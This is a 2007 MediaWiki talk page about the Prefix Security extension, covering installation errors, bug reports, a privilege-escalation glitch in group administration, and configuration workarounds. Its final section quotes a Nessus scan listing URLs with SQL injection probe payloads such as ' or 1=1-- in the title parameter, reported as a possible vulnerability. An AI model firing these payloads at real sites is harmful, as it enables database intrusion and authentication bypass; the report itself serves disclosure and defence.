Extension talk:Prefix Security

Where is the download link ? I am very much interested in this work. Jean-Lou Dupont 14:07, 9 February 2007 (UTC)

Try now. I was editing site till now.

Bug Report: Removal Glitches
For some reason, attempting to remove a user from a group results in a "the special page doesn't exist" error.
 * Hi, i have the same pb of "Special page doesn't exist". i use MW 1.9.3 and PHP 5 --Ouaibsky 12:02, 13 April 2007 (UTC)

In addition, removal of a Prefix leaves pages with that prefix labeled as being protected by it.

--Dataweaver 01:08, 13 April 2007 (UTC)

Creation-Rights
It would be useful, if there would not only be read/write-rights, but als create. E.g. on several pages which i would like to protect with Prefix, I want every people to write. But new articles with a defined prefix should only be created by a smaller list of users. --Xwolf 09:32, 16 May 2007 (UTC)

ERROR 1146: "Napaka zbirke podatkov"
When opening special page Groups Administration for the first time (to make installation) I get an error »1146: Table 'wikidb.user_groups' doesn't exist (localhost)«.

My settings:

$wgDBserver        = "localhost";

$wgDBname          = "wikidb";

Its trou I don't have the table user_groups. How to make one?

I think installation of extension didn't work at all.

Solution: Those 4 files you have to put directly in map /extensions. My mistake was, that I put them in map /extensions/Prefix Security.

Installation instructions incorrect?
We're using: MediaWiki: 1.7.1 PHP: 5.0.5-3 (apache2handler) MySQL: 4.0.24_Debian-10sarge2-log

The installation instructions (readme) say:

Then edit your LocalSettings.php file and add the following lines: require_once( 'extensions/GroupsAdministration.php' ); require_once( 'extensions/PrefixAdministration.php' ); $wgWhitelistRead = array ( "username1", "username2" );

However, that didn't work--I (a sysop) couldn't access the Group or Prefix special pages. Our system admin says:


 * After reviewing the php code, I end up adding this:

$wgGroupPermissions['logged']['prefixAdministration'] = array ( 'user1' );
 * in the LocalSettings.php file instead of

$wgWhitelistRead = array ( 'user1' );
 * to give us access to these special pages.

Elf 04:08, 9 June 2007 (UTC)

Prefix security doesn't seem to work
(See above for what versions we're using.)

I added a group and a prefix ("Xyz" or "xyz", doesn't matter). The group has only me in it. I gave one user (myself) and the new group read/edit access to the prefix and everyone else read-only access. But still anyone can edit the pages ("Xyz test", "Xyz: test"). I don't know what we're doing wrong. Can someone help?
 * Elf 00:20, 9 June 2007 (UTC)

Security glitch
The GroupAdministration, although it's supposed to be for sysops, displays Bureaucrats as a valid group, and, as a sysop, I successfully added myself to the Bureaucrat group. Should it do this? Is there a way to prevent this? Thanks again. (Just my day for asking questions.) Elf 01:19, 9 June 2007 (UTC)

Info displayed in Special:Versions is out of date
(See above for versions we're using.) When displaying Special:Version, we get these links for these extensions:


 * Groups Administration
 * PrefixAdministration

Which no longer exist; they shd be pointing here to Mediawiki. Elf 21:41, 12 June 2007 (UTC)

Issue with PageRestrictionHooks.php
Whenever I add  to LocalSettings.php, my wiki becomes unreachable. Is there something wrong with the code online for that file that is causing the issue? Sean Et Cetera 16:52, 12 July 2007 (UTC)
 * I think I found the problem.   does not have a closing }, and I think that's what kept killing it for me.  That, and   appeared to have the same problem. Sean Et Cetera 19:26, 12 July 2007 (UTC)

SQL Injection
After enabling this extension a nessus scan of the server showed it as vunrable to SQL injection. Has anyone else seem this?

The following URLs seem to be vulnerable to various SQL injection techniques :

/index.php?-=&title='UNION'&section=1&printable=yes&action=edit /index.php?-=&title='&section=1&printable=yes&action=edit /index.php?-=&title='%22&section=1&printable=yes&action=edit /index.php?-=&title='bad_bad_value&section=1&printable=yes&action=edit /index.php?-=&title=bad_bad_value'&section=1&printable=yes&action=edit /index.php?-=&title='WHERE&section=1&printable=yes&action=edit /index.php?-=&title='OR&section=1&printable=yes&action=edit /index.php?-=&title=' or 1=1-- &section=1&printable=yes&action=edit /index.php?-=&title=' or 'a'='a&section=1&printable=yes&action=edit /index.php?-=&title=') or ('a'='a&section=1&printable=yes&action=edit /index.php?-=&title=%27&section=1&printable=yes&action=edit /index.php?-=&title='+OR+1=1)&section=1&printable=yes&action=edit /index.php?-=&title='+OR+1=1))&section=1&printable=yes&action=edit /index.php?-=&title='+OR+1=1#&section=1&printable=yes&action=edit /index.php?-=&title='+OR+1=1)#&section=1&printable=yes&action=edit /index.php?-=&title='+OR+1=1))#&section=1&printable=yes&action=edit /index.php?-=&title='+or+1=1/*&section=1&printable=yes&action=edit /index.php?-=&title='+or+1=1)/*&section=1&printable=yes&action=edit /index.php?-=&title='+or+1=1))/*&section=1&printable=yes&action=edit /index.php?-=&title='+convert(int,convert(varchar,0x7b5d))+'&section=1&printable=yes&action=edit /index.php?-=&title='+convert(varchar,0x7b5d)+'&section=1&printable=yes&action=edit /index.php?-=&title='%2Bconvert(int,convert(varchar%2C0x7b5d))%2B'&section=1&printable=yes&action=edit /index.php?-=&title='%2Bconvert(varchar%2C0x7b5d)%2B'&section=1&printable=yes&action=edit

An attacker may exploit this flaws to bypass authentication or to take the control of the remote database.